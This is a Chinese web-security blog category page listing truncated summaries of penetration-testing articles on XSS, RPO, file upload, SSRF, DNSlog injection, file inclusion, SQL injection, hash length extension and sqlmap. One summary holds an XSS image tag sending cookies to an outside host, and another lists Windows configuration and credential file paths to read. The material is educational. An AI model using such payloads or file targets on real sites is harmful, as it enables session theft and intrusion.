随笔分类 - 安全相关—web sec
摘要:无CSP保护下的xss 1.直接嵌入型 <img src="192.168.81.137:80/xss.php?a=[cookie]"> 过滤较少时,优先考虑。触发方式比较直接,直接嵌入能够xss的js代码。 target端 /xx.html <!DOCTYPE html> <html> <head
阅读全文
摘要:0 什么是RPO攻击? RPO(Relative Path Overwrite)相对路径覆盖,是一种新型攻击技术,最早由Gareth Heyes在其发表的文章中提出。主要是利用浏览器的一些特性和部分服务端的配置差异导致的漏洞,通过一些技巧,我们可以通过相对路径来引入其他的资源文件,以至于达成我们想要
阅读全文
摘要:0x01 概要说明 文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上
阅读全文
摘要:https://www.bugbank.cn/q/article/5983de41cbb936102d397781.html
阅读全文
摘要:WINDOWS下: c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt/my.ini c:\mys
阅读全文
摘要:前言 0x00 SSRF是什么 能精简的就不扯淡,一句话就是:利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。 0x01 SSRF能干什么 探测内网信息 攻击内网或本地其他服务 穿透防火墙 。。。 探测内网信息 攻击内网或本地其他服务 穿透防火墙 。。。 0x02 SSRF怎么找 能够对外
阅读全文
摘要:前言 在渗透测试中,经常遇到如下情景: dnslog盲注原理 开放的DNSlog平台: http://ceye.io/ 在http://ceye.io/上我们可以获取到有关ceye.io的DNS查询信息。 域名解析的过程,是由顶级域名向下逐级解析。我们构造的攻击语句也是如此,当它发现域名中存在cey
阅读全文
摘要:代码审计1、全面总结http://find-sec-bugs.github.io/bugs.htm 2、python安全https://github.com/bit4woo/python_sec 内网渗透1、内网渗透攻防总结https://github.com/infosecn1nja/AD-Att
阅读全文
摘要:目录 0×01 文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一
阅读全文
摘要:目录: 一、SQL注入漏洞介绍 二、修复建议 三、通用姿势 四、具体实例 五、各种绕过 一、SQL注入漏洞介绍: SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关
阅读全文
摘要:先放一个简单点的利用了Hash长度拓展攻击的题目 在理解Hash长度拓展攻击之前需要大致了解下MD5的加密原理 MD5加密过程 1.数据分组 在MD5加密算法中,将一个字符串分为若干个大小为512位的分组,而每一个分组又可分为16个子分组m0~m3{A},m4~m7{B},m8~m11{C},m12
阅读全文
摘要:sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 sqlmap简介 sqlmap支持五种不同的注入模
阅读全文
摘要:一 实验环境 0x01 ZvulDirll 0x02 下载地址https://github.com/redBu1l/ZVulDrill 二 配置安装 0x01 在你网站的根目录下创建一个VulDrill文件夹。解压ZVulDrill压缩包,将解压内容(不含最外层文件夹名zvuldrill-maste
阅读全文
浙公网安备 33010602011771号